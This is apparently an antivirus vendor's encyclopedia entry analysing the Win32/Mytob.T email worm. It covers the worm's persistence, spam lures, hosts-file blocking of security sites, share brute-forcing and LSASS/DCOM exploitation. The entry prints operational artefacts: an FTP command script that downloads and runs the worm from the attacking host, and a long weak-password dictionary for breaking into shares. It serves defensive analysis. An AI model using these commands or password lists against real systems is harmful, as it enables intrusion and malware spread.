Threat Encyclopedia

Selected viruses, spyware, and other threats: sorted alphabetically

Win32/Mytob.T

MyTob.T is a typical mass mailing e-mail worm, the size is 51062 bytes and the worm is runtime compressed by UPack, an executable runtime packer.

Note: In the following text, %windir% denotes Windows directory (e.g. C:\WINDOWS) and %system% denotes Windows System directory (e.g. C:\WINDOWS\SYSTEM32) as they differ on various versions of Microsoft Windows.

Installation and Autostart Techniques

Upon execution the worm copies itself into the System32 folder as "taskgmr.exe" and creates another self-copy using the file name NETHELL.EXE.

It also drops the component, HELLMSN.EXE, in the root directory, which is usually C:\.
This dropped component is detected by NOD32 as W32/Mytob.J (MSN Messenger Spreading Component)

Mytob.T creates self-copies directly in the root directory:

funny_pic.scr
my_photo2005.scr
see_this!!.scr

The worm creates a mutex "ggmutexk2" to avoid multiple running instances of the worm on one machine.
The worm adds the following registry key to the registry to make sure that it runs every time windows is started:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"WINTASK" = "taskgmr.exe"

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
"WINTASK" = "taskgmr.exe"

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
"WINTASK" = "taskgmr.exe"

MyTob.T adds also the following registry keys:

HKLM\Software\Microsoft\OLE
"WINTASK" = "taskgmr.exe"

HKCU\Software\Microsoft\OLE
"WINTASK" = "taskgmr.exe"

HKLM\System\CurrentControlSet\Control\Lsa
"WINTASK" = "taskgmr.exe"

HKCU\System\CurrentControlSet\Control\Lsa
"WINTASK" = "taskgmr.exe"

Note: The worm watches continuously for the presence of these registry keys and recreates them if they are not present anymore.

E-mail harvesting

The worm scans all fixed disks and collects e-mail addresses out of files which match one of the following file extensions:

*.wab, *.adb, *.tbb, *.dbx, *.asp, *.php, *.sht, *.htm, *.pl

However, these extensions are pretty much useless, because the worm has a bug regarding stringcat and compare with the WIN32_FIND_DATA results.
That said: The worm will always open and scan a file for e-mail addresses when at least one character matches one of the characters in the file extension list in the correct order.
In technical terms, that means the worm compares the file extension via 'instring function/substring function'.

Example: The worm will search for e-mail addresses in files where the file extension matches *.htm, *.ht, *.h for instance.

DNS resolving

The worm performs DNS e-mail-exchange-queries to find an appropriate mail server for each domain it tries to send itself to. If this DNS request for the mail server fails, the worm tries to guess the e-mail server adding in front of the domain name the following prefixes:

gate.
mx.
mail.
smtp.
mx1.
mxs.
mail1.
relay.
ns.


E-mail Sender

The worm generates the sender's e-mail addresses using the following list of names:

adam, alex, alice, andrew, anna, bill, bob, brenda, brent, brian, britney, bush, claudia, dan, dave, david, debby, fred, george, helen, jack, james, jane, jerry, jim, jimmy, joe, john, jose, julie, kevin, leo, linda, lolita, madmax, maria, mary, matt, michael, mike, peter, ray, robert, sam, sandra, serg, smith, stan, steve, ted, tom

at which it adds randomly, domain names (the domain names are encrypted and stored in the worm):

aol.com cia.gov fbi.gov hotmail.com juno.com msn.com yahoo.com
It uses its own SMTP (Simple Mail Transfer Protocol) engine to mass-mail copies of itself to other e-mail addresses.

E-mail subjects

MyTob.T selects randomly an e-mail subject out of the following list:

Error
Status
Server Report
Mail Transaction Failed
Mail Delivery System
hello
Good day

Note: The e-mail subjects are encrypted and stored in the worm.

Message Body

The e-mail contains one of the following message texts

Mail transaction failed. Partial message is available.
The message contains Unicode characters and has been sent as a binary attachment.
The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.
The original message was included as an attachment.
Here are your banks documents.

Note: The worm may also send e-mails containing a blank message body or random strings.

E-mail Attachments

The worm attaches one of the following file names with a self-copy:

body
message
test
data
file
text
doc
readme
document

with one of the following file extensions:

bat
cmd
exe
scr
pif
zip

The worm may also attach itself as a ZIP file. The file inside the ZIP archive may have two extensions, the first chosen from the following list:

htm
txt
doc

The second extension is chosen from the following list and is separated from the first extension by a huge amount of spaces to hide the executable file extension:

pif
scr
exe

Example: attachment "text.zip" may contain the file "text.txt { spaces }.scr"

The worm avoids e-mail addresses which contain parts of the following list:

.gov, .mil, abuse, accoun, acketst, admin, anyone, arin., avp, be_loyal:, berkeley,
borlan, bsd, bugs, certific, contact, example, fcnz, feste, fido, foo., fsf., gnu, gold-certs,
google, gov., help, hotmail, iana, ibm.com, icrosof, icrosoft, ietf, info, inpris, isc.o,
isi.e, kernel, linux, listserv, math, mit.e, mozilla, msn., mydomai, nobody, nodomai,
noone, not, nothing, ntivi, page, panda, pgp, postmaster, privacy, rating, rfc-ed, ripe.,
root, ruslis, samples, secur, sendmail, service, site, soft, somebody, someone, sopho,
spm, submit, support, syma, tanford.e, the.bat, unix, usenet, utgers.ed, webmaster,
www, you, your, -._!, -._!@

Note: the first missing character should match, for instance, "Microsoft" as well as "microsoft".

Hostfile Manipulation

It overwrites the present "hosts" file with the following data to avoid accessing these sites:

127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 www.microsoft.com
127.0.0.1 www.trendmicro.com

Network Distribution (Shares)

Scans for shared folders and tries to gain write access with the following weak passwords:

(blank password)
!@#$ !@#$% !@#$%^ !@#$%^& !@#$%^&* % 0 00 000 0000 00000
000000 00000000 007 0wn3d 0wned 1 110 111 111 111111 11111111 11111111 12 121
121212 123 123123 123321 1234 12345 123456 1234567 12345678 123456789 12346
123467 1234678 12346789 123467890 1234qwer 123abc 123asd 123qwe 2002 2003 2600
54321 54321 54321 654321 654321 aaa abc abc123 abcd ACCESS access account accounts adm admin ADMIN Admin admin123 Administrador Administrateur administrator ADMINISTRATOR Administrator guest GUEST Guest pass pass123 pass1234 passphra passwd password PASSWORD Password password1 password123 unknown Unknown user USER User user1 usermane username userpassword win win2000 win2k win98 windose windows windows2k windows95 windows98 windowsME WindowsXP windowz windoze windoze2k windoze95 windoze98 windozeME windozexp wine wing winnt winpass winston winxp wired xp xx xxx xxxx xxxxx xxxxxx xxxxxxx xxxxxxxx xxxxxxxxx 007 test none changeme default system server null qwerty mail outlook web www internet accounts accounting home homeuser user user1 oem oemuser qaz asd qwe mike john peter luke ron sam barbara mary sue susan joan joe peter fred frank brian spencer lee neil ian george bruce kate katie login loginpass owa sage technical backup exchange exchnge fuck sex god hell fish heaven orange domain domainpass domainpassword database access dbpass dbpassword databasepass data databasepassword db1 db1234 sql sqlpass sa cisco dell compaq siemens yellow pink xp control mass office blank winpass capitol userpassword main hq headoffice ctx nokia lan internet intranet bill fred freddy
glen turnip afro user1 student student1 teacher staff oeminstall root Root ROOT CISCO Cisco

Drops one of the following files, if the worm successfully accessed a shared folder:

Admin$\system32\taskgmr.exe
Admin$\taskgmr.exe
ipc$\system32\taskgmr.exe
ipc$\taskgmr.exe
print$\system32\taskgmr.exe
print$\taskgmr.exe
c$\winnt\system32\taskgmr.exe
c$\taskgmr.exe
d$\taskgmr.exe
lwc$\taskgmr.exe
NETLOGON\taskgmr.exe
SYSVOL\taskgmr.exe
profiles$\taskgmr.exe
e$\taskgmr.exe

Exploiting technologies

The worm generates random IP addresses and attempts to connect to port 445 of the generated IP's to exploit the LSASS buffer overflow vulnerability [see MS04-011]. If the vulnerability exploit is successful, it executes code (shellcode) on the target machine, which instructs it to connect back to the source in order to retrieve a copy of the worm. (This copy is uploaded to the target machine by the created FTP Server-Connection using 2pac.txt FTP-Commands file)

The worm takes also advantage of the DCOM RPC vulnerability [see MS03-026] for spreading.
The 2pac.txt file contains the following ftp commands:

open %IP% %TCP port%
user hell rulez
binary
get bingoo.exe
quit

The worm executes FTP.EXE locally on the compromised system to retrieve a copy of the worm with the name "bingoo.exe" from the connecting system, and starts this file after downloading.

References:
http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Other Details:

The worm also provides IRC-Backdoor functionality with the following functions:

Downloading files
Downloading new worm updates
Executing files
Providing uptime information to the remote controller
Providing information about the worm variant to the remote controller
Notifying IRC Channels/Operator via private message
Restarting the computer

The worm is able to send copies via MSN Messenger to all online contacts in the contact list.